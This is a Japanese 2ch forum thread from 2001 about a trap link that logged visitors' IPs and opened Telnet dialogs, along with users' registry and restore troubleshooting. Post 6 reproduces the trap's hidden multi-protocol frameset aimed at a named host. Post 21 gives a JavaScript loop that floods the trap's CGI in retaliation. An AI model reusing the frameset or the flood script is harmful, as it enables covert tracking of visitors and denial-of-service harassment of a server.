個人情報盗まれた?

このエントリーをはてなブックマークに追加
1みみか
昨日、2ch掲示板にてURLをクリックしたら、IPが標示されてTelnet?のダイアルログが沢山出てきました。
「ゴキブリホイホイ1号」と上に標示されていました。
これはなんですか?かなり初心者なので教えて下さい。
問題のURL

http://samurai-x.hypermart.net/cgi-bin/kitty.cgi
知らない人は押さないで下さい。
2:2001/06/22(金) 13:18 ID:???
ネット初心者は今人がいないみたいだからセキュリティ板で聞くといい。
3みみか:2001/06/22(金) 13:34 ID:I5Z6z9HI
急ぎませんので、夜までまちます(笑)
ありがとう(=^_^=)
4 :2001/06/22(金) 16:59 ID:???
>1
知ってる人も押さないよ(w
設定いぢるの面倒だし。
普通にネット楽しみたいし。エロ動画とか(w
5atsugi1-130.kcom.ne.jp:2001/06/23(土) 00:56 ID:eo.BNbj6
>>1 押して見たよ。厨房ほいほいにされてしまった。
LOGFile見たらおもいおもい。
んで、繋げたままにしてるけど、誰か入ってくるのかな?
待ってるよ!
6 :2001/06/23(土) 01:50 ID:CRYaBmtY
<frameset rows="100%,0,0,0,0,0,0,0,0,0">
<frame src="http://samurai-x.hypermart.net/cgi-bin/kitty.cgi?mode=ipget&port=3532">
<frame src="ftp://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="gopher://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="https://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="pnm://samurai-x.hypermart.net:3532/pnmiptrace" scrolling=no noresize>
<frame src="mms://samurai-x.hypermart.net:3532/mmsiptrace" scrolling=no noresize>
<frame src="rlogin://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="tn3270://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="telnet://samurai-x.hypermart.net:3532/" scrolling=no noresize>
<frame src="news://samurai-x.hypermart.net:3532/" scrolling=no noresize>
</frameset>
75 もう切ったよ:2001/06/23(土) 02:15 ID:O/5T63RA
Windows再起動すると、Windowsの更新は 無事行った となりますが
どのファイルいじったんだろう。

取りあえず User.dat とSystem.dat をいじるようなやつは嫌い。
8>7:2001/06/23(土) 02:18 ID:pHJX9Fhw
scanreg /restore しとけよ!!
9名無しさん:2001/06/23(土) 02:27 ID:???
>>8
ワッツイズrestore?
10名無しさん:2001/06/23(土) 02:29 ID:???
とりあえずnetstatでは侵入者の痕跡はない
115 もう切ったよ:2001/06/23(土) 02:29 ID:???
もう三回再起動したので restore は無意味ですね。
いや いいんだけどね。
128:2001/06/23(土) 02:34 ID:pHJX9Fhw
>>11

バックアップは1日1回でなかったか?
とりあえずscanreg /restore しとけって。
135 もう切ったよ:2001/06/23(土) 02:38 ID:???
うぃ!
14PORT:2001/06/23(土) 02:41 ID:pHJX9Fhw
どっかかわったポート開いてないか?
15名無しさん:2001/06/23(土) 02:42 ID:???
>>8
再起動する前にバックアプしてしまいました(w
16名無しさん:2001/06/23(土) 02:43 ID:???
>pHJX9Fhw
やたら熱心だね
17:2001/06/23(土) 02:47 ID:pHJX9Fhw
>>15
レジストリの復旧出来ないってこと?
それとももうとっくに直したってこと?
185 もう切ったよ:2001/06/23(土) 02:59 ID:???
HKEY_CLASSES_ROOT キーまたはサブキー 最終カキコ 時間更新 七回
キーまたはサブキー 作成 or 削除 または キー名変更 二回
HKEY_CURRENT_USER 二回
零回
HKEY_LOCAL_MACHINE 八回
一回
HKEY_USERS 二回
零回
HKEY_CURRENT_CONFIG 八回
零回
HKEY_DYN_DATA 零回 零回

ちなみに私 >>8 では有りません。
195 もう切ったよ:2001/06/23(土) 03:01 ID:???
8さん 失礼。
訂正 正: ちなみに私 >>15 では有りません。
20namae:2001/06/23(土) 03:44 ID:???
ログ↓
http://samurai-x.hypermart.net/cgi-bin/ipahyalogz.txt

これさぁ、前に takahashi っ奴がやってなかった?
21皆でやれば怖くない?:2001/06/23(土) 05:04 ID:???
<HTML>
<HEAD>
<TITLE>ばーか、samurai-x</TITLE>
</HEAD>
<BODY>
<FORM name="form"><INPUT id="number" type="TEXT"></FORM>

<SCRIPT language="JavaScript">
<!--

alert("START!!");

var URL = "view-source:http://samurai-x.hypermart.net/cgi-bin/kitty.cgi?mode=ipget&port=";
var Number = 0;
var WID = window.open("");

function doOpen()
{
WID.location.replace(URL + Number);
document.form.number.value = Number;
Number++;
}

var TID = setInterval("doOpen();", 1);

//-->
</SCRIPT>
</BODY>
</HTML>
22:2001/06/23(土) 12:04 ID:5HrGhsWc
>>18
それどういう事?
レジストリ書き換えられたの?

>>21
これは何?
>>1 のURL作者への攻撃が出来るの?
23みみか:2001/06/23(土) 14:17 ID:moH7oQKQ
あの・・・。ところで原因はなんなんでしょう?
一応メールパスワードは変更したんですけど。
大丈夫なんでしょうか?
24みみか:2001/06/23(土) 14:23 ID:moH7oQKQ
>>5
厨房ほいほいにされてしまったってなんですか?
255 もう切ったよ:2001/06/23(土) 23:59 ID:???
>>22 >>7のとおり、 User.dat とSystem.datいじってるみたいなのね。
んで、フリーソフト入れて監視しながら >>1 へ行くと >>18 のとおり
さわられている。

ただ、media playerとRealPlayerの更新させようとしているみたいだから
それが、レジストリにアクセスしているのかな?と思う。

265 もう切ったよ:2001/06/24(日) 00:04 ID:???
>>24 「ゴキブリホイホイ1号」と上に標示されていました。

これは -厨房ホイホイ1号♪- と表示してなかったか?
275 もう切ったよ:2001/06/24(日) 00:06 ID:???
>>23 何にも影響ないでしょ。俺はそのままです。
28Test:2001/06/24(日) 00:57 ID:8eKLrK.g
>>8>>22が同じやつ とは思えない。
リアル厨房?
リアル消防か?
29みみか
>>26 「ゴキブリホイホイ」じゃなくて「厨房」だったと思います。
恐くなってあわてて閉じちゃったので、よく覚えてませんでした。
>>27 ありがとう。とりあえず大丈夫だということがわかったので、安心しました。
みなさんありがとうございました(=^_^=)